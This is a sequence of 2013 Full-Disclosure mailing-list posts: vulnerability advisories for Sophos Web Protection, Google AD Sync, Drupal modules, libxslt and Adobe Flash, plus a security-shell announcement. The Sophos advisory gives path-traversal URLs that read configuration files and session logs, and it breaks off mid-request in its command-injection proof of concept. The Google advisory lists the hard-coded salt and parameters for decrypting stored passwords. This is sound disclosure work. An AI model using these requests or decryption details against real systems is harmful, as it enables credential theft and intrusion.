[Full-disclosure] SEC Consult SA-20130403-0 :: Multiple vulnerabilities in Sophos Web Protection Appliance
SEC Consult Vulnerability Lab Security Advisory 20130403-0 === title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: = 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 homepage: http://www.sophos.com/ found: 2013-01-14 by: Wolfgang Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor/product description: - Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users. URL: http://www.sophos.com/en-us/products/web/web-protection.aspx Business recommendation: SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. Some components have been spot-checked, while others have not been tested at all. An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks. Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible. If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling in various attacks targeting clients (MITM, phishing, evilgrade, ...). The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor. Vulnerability overview/description: --- 1) Unauthenticated local file disclosure (CVE-2013-2641) Unauthenticated users can read arbitrary files from the filesystem with the privileges of the spiderman operating system user. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated. 2) OS command injection (CVE-2013-2642) Authenticated users can execute arbitrary commands on the underlying operating system with the privileges of the spiderman operating system user. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration). 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) Reflected Cross Site Scripting vulnerabilities were found. An attacker can use these vulnerabilities the exploit other vulnerabilities in the web interface or conducting phishing attacks. Proof of concept: - 1) Unauthenticated local file disclosure (CVE-2013-2641) As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication: https://host/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users: https://host/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 An excerpt from the log file shows that it contains PHP session ID information (parameter STYLE). host - - [21/Feb/2013:17:02:17 +] POST /index.php?c=dashboard HTTP/1.1 200 139 https://host/index.php?section=configurationc=configurationSTYLE=8514d0a3c2fc9f8d47e2988076778153 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 2) OS command injection (CVE-2013-2642) The Diagnostic Tools functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`). These commands are run with the privileges of the operating system user spiderman: POST /index.php?c=diagnostic_tools HTTP/1.1 Host
[Full-disclosure] Google AD Sync Tool - Exposure of Sensitive Information Vulnerability
Sense of Security - Security Advisory - SOS-13-001
Release Date. 03-Apr-2013
Last Update. -
Vendor Notification Date. 03-Sep-2012
Product. Google Active Directory Sync (GADS) Tool
Platform. Windows, Linux, Solaris
Affected versions. All versions up to 3.1.3
Severity Rating. High
Impact.Exposure of sensitive information
Attack Vector. From local without authentication
Solution Status. Upgrade to version 3.1.6
CVE reference. CVE - not yet assigned
Details.
Due to a weakness in the way the Java encryption algorithm
(PBEwithMD5andDES) has been implemented in the GADS tool all
stored credentials can be decrypted into plain-text. This
includes all of the encrypted passwords stored in any end-users
saved XML configuration file, such as Active Directory accounts,
SMTP, Proxy details, LDAP and OAuth tokens, etc.
Proof of Concept.
Using the following information from the XML and GADS tool to
decrypt all encrypted passwords from any XML:
1. The hard coded salt:
SALT[] = { -87, -101, -56, 50, 86, 53, -29, 3 }
2. The hard coded DES interation count:
ITERATION_COUNT = 20
3. The Secret key derived from the uniqueID value in the XML:
6512630db9a74d90a5531f574b85f398
4. The cipher-text from the XML:
encryptedAdminPassword1edOUtamjNA=/encryptedAdminPassword
5. The algorithm: PBEwithMD5andDES
The decrypted value is: winning!
Solution.
Upgrade to version 3.1.6
Discovered by.
Nathaniel Carew from Sense of Security Labs.
About us.
Sense of Security is a leading provider of information security and
risk management solutions. Our team has expert skills in assessment
and assurance, strategy and architecture, and deployment through to
ongoing management. We are Australia's premier application penetration
testing firm and trusted IT security advisor to many of the country's
largest organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au/consulting/penetration-testing
E: i...@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-13-001.pdf
Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-040 - Commerce Skrill (Formerly Moneybookers) - Access bypass
View online: http://drupal.org/node/1960338 * Advisory ID: DRUPAL-SA-CONTRIB-2013-040 * Project: Commerce Skrill (Formerly Moneybookers) [1] (third-party module) * Version: 7.x * Date: 2013-April-03 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module integrates the Skrill online payment services [3] with Drupal Commerce. When processing Instant payment notifications (IPN), the Moneybookers enterprise payment method provided by the Commerce Skrill contributed module does not perform sufficient access checking, potentially allowing forged notifications to be accepted as valid. The vulnerability is mitigated by the fact that it only affects the Moneybookers enterprise payment method. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [4] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- The Moneybookers enterprise payment method provided by the Commerce Skrill [5] contributed module in all versions prior to 7.x-1.2. Drupal core is not affected. If you do not use the contributed Commerce Skrill (Formerly Moneybookers) [6] module, there is nothing you need to do. SOLUTION Install the latest version. The Moneybookers enterprise payment method now requires the use of the hash security option. * Upgrade to Commerce Skrill 7.x-1.2 [7] * Go to the backoffice of Skrill and enable the securityHash verification following the Administration Processing Processing Settings section. * Get the security token, and paste it in the Secret key field of the payment method configuration form. Also see the Commerce Skrill (Formerly Moneybookers) [8] project page. REPORTED BY - * Julien Dubreuil [9] the module maintainer FIXED BY * Julien Dubreuil [10] the module maintainer * Jonathan Sacksick [11] the module maintainer COORDINATED BY -- * Klaus Purer [12] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16]. [1] http://drupal.org/project/commerce_moneybookers [2] http://drupal.org/security-team/risk-levels [3] https://www.moneybookers.com/ads/partners/?p=Drupalcommerce [4] http://cve.mitre.org/ [5] http://drupal.org/project/commerce_moneybookers [6] http://drupal.org/project/commerce_moneybookers [7] http://drupal.org/node/1959998 [8] http://drupal.org/project/commerce_moneybookers [9] http://drupal.org/user/519520 [10] http://drupal.org/user/519520 [11] http://drupal.org/user/972218 [12] http://drupal.org/user/262198 [13] http://drupal.org/contact [14] http://drupal.org/security-team [15] http://drupal.org/writing-secure-code [16] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-041 - Chaos tool suite (ctools) - Access bypass
View online: http://drupal.org/node/1960406 * Advisory ID: DRUPAL-SA-CONTRIB-2013-041 * Project: Chaos tool suite (ctools) [1] (third-party module) * Version: 7.x * Date: 2013-April-03 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This CTools module provides a set of APIs and tools to improve the developer experience. The module doesn't sufficiently enforce node access when providing an autocomplete list of suggested node titles, allowing users with the access content permission to see the titles of nodes which they should not be able to view. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Chaos tool suite (ctools) 7.x-1.x versions prior to 7.x-1.3. Drupal core is not affected. If you do not use the contributed Chaos tool suite (ctools) [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Ctools module for Drupal 7.x, upgrade to Ctools 7.x-1.3 [5] Also see the Chaos tool suite (ctools) [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team * Cash Williams [8] FIXED BY * Daniel Wehner [9] the module maintainer. * Cash Williams [10] * Lee Rowlands [11] of the Drupal Security Team COORDINATED BY -- * Lee Rowlands [12] of the Drupal Security Team * Greg Knaddison [13] of the Drupal Security Team * Ben Jeavons [14] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [15]. Learn more about the Drupal Security team and their policies [16], writing secure code for Drupal [17], and securing your site [18]. [1] http://drupal.org/project/ctools [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/ctools [5] http://drupal.org/node/1960424 [6] http://drupal.org/project/ctools [7] http://drupal.org/user/36762 [8] http://drupal.org/user/421070 [9] http://drupal.org/user/99340 [10] http://drupal.org/user/421070 [11] http://drupal.org/user/395439 [12] http://drupal.org/user/395439 [13] http://drupal.org/user/36762 [14] http://drupal.org/user/91990 [15] http://drupal.org/contact [16] http://drupal.org/security-team [17] http://drupal.org/writing-secure-code [18] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS vulnerability in Adobe Flash Player (BSOD)
Hello list! I want to warn you about Denial of Service vulnerability (BSOD) in Adobe Flash Player. I've found this vulnerability at 27.01.2013. - Affected products: - Vulnerable version is Adode Flash 11.5.502.146. Attack works only on AMD/ATI video cards. Adobe have fixed it at 12.02.2013 in their patch APSB13-05 (https://www.adobe.com/support/security/bulletins/apsb13-05.html), which fixed multiple vulnerabilities in flash player. At that Adobe did it hiddenly without mentioned about this vulnerability and without referencing on me. After my informing in the end of January, they was checking it during 1,5 months and said, that they can't reproduce this vulnerability (at that I've reproduced it on multiple computers with ATI video cards), that they don't know anything (the hole was accidentally fixed in APSB13-05) and this DoS doesn't related to them. -- Details: -- Denial of Service (WASC-10): This is Denial of Service vulnerability, which leads to crash of Operating System (tested on Windows XP and 7). Here is video, which demonstrates this vulnerability in Flash: http://www.youtube.com/watch?v=xi29KZ3LD80 This is memory corruption (access violation) vulnerability. Which can be used for BSOD and potentially for remote code execution. For attack the flash-file is used VideoJS Flash Component from Zencoder. I've informed developers of this video player already in beginning of February. Attack works in browsers Firefox and Opera (at that BSOD works only in Firefox): In Mozilla Firefox 15.0.1 and 18.0.1 - freezing of the browser (which can't be closed) and BSOD of the system. In Mozilla Firefox 3.0.19 and 10.0.7 ESR - no problems (all is working normally). In Opera 10.62 - freezing of the browser (which can be closed). PoC/Exploit: http://websecurity.com.ua/uploads/2013/Adobe%20Flash%20DoS%20BSOD.rar To start the exploit it's needed to placed it on web server (e.g. on localhost), put any mp4-file under name poc.mp4 near poc.htm and start htm-file (at web server). And then click on speaker image or on area of video player. Timeline: 2013.01.27 - found vulnerability. 2013.01.28 - recorded video PoC. And in the night have informed developers. 2013.02.01 - again informed developers, because they didn't answer. After that Adobe answered on the first letter. 2013.02.08 - informed developers of VideoJS. 2013.02.12 - Adobe fixed vulnerability and released patch, but still investigating. 2013.02-03 - during February-March, while Adobe was investigating this vulnerability, I've sent them information about different tested computers where hole was working (on ATI cards) and was not working (on nVidia cards). And sent them all information they needed. 2013.03.02 - announced at my site. 2013.03.13 - Adobe finished investigation. 2013.04.03 - disclosed at my site (http://websecurity.com.ua/6364/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2654-1] libxslt security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2654-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso April 03, 2013 http://www.debian.org/security/faq - - Package: libxslt Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2012-6139 Debian Bug : 703933 Nicolas Gregoire discovered that libxslt, an XSLT processing runtime library, is prone to denial of service vulnerabilities via crafted xsl stylesheets. For the stable distribution (squeeze), this problem has been fixed in version 1.1.26-6+squeeze3. For the testing distribution (wheezy), this problem has been fixed in version 1.1.26-14.1. For the unstable distribution (sid), this problem has been fixed in version 1.1.26-14.1. We recommend that you upgrade your libxslt packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlFcqU8ACgkQYy49rUbZzlptIwCghnah1/6yrUqfvxoJYXCtYmCd DegAoJzXB7az2y4oFJeI2kndNmVwQXuy =Bdxn -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hackersh 0.1 Release Announcement
Hi All, I am pleased to announce the first version of Hackersh ( http://www.hackersh.org). Hackersh (Hacker Shell) is a free and open source shell (command interpreter) written in Python with built-in security commands, and out-of-the-box wrappers for various security tools, using Pythonect as its scripting engine. Pythonect is a new, experimental, general-purpose high-level dataflow programming language based on Python. It aims to combine the intuitive feel of shell scripting (and all of its perks like implicit parallelism) with the flexibility and agility of Python. The combination of the two makes: http://localhost; - url - nmap - w3af - print An actual workflow that takes 'http://localhost', parses it as a URL, scans it for open ports (via Nmap), and for each HTTP service - launches a separate web vulnerabilities scan (via W3af). Curious about the output? Here's a screenshot: http://hackersh.org/hackersh000dev0_1.png Hackersh is not limited to penetration testing and can be applied to other security domains including but not limited to: malware analysis, vulnerability development and intelligence gathering (OSINT). You can read more about Hackerh and its features at: http://blog.ikotler.org/2013/04/hackersh-01-release-announcement.html If you have any questions, do not hesitate to contact me Regards, Itzik Kotler | http://www.ikotler.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS vulnerability in Adobe Flash Player (BSOD)
On Thu, Apr 04, 2013 at 01:24:29AM +0300, MustLive wrote: Hello list! I want to warn you about Denial of Service vulnerability (BSOD) in Adobe Flash Player. I've found this vulnerability at 27.01.2013. - Affected products: - Vulnerable version is Adode Flash 11.5.502.146. Attack works only on AMD/ATI video cards. Adobe have fixed it at 12.02.2013 in their patch APSB13-05 (https://www.adobe.com/support/security/bulletins/apsb13-05.html), which fixed multiple vulnerabilities in flash player. At that Adobe did it hiddenly without mentioned about this vulnerability and without referencing on me. After my informing in the end of January, they was checking it during 1,5 months and said, that they can't reproduce this vulnerability (at that I've reproduced it on multiple computers with ATI video cards), that they don't know anything (the hole was accidentally fixed in APSB13-05) and this DoS doesn't related to them. Sorry, but how can this be a vuln in *Flash*, a *user-space* component, if it can be used to cause a BSOD, which, as far as I know, means that something bad happened *in the Kernel*? Sounds to me as if Flash is not the (or at least not the only) culprit... signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
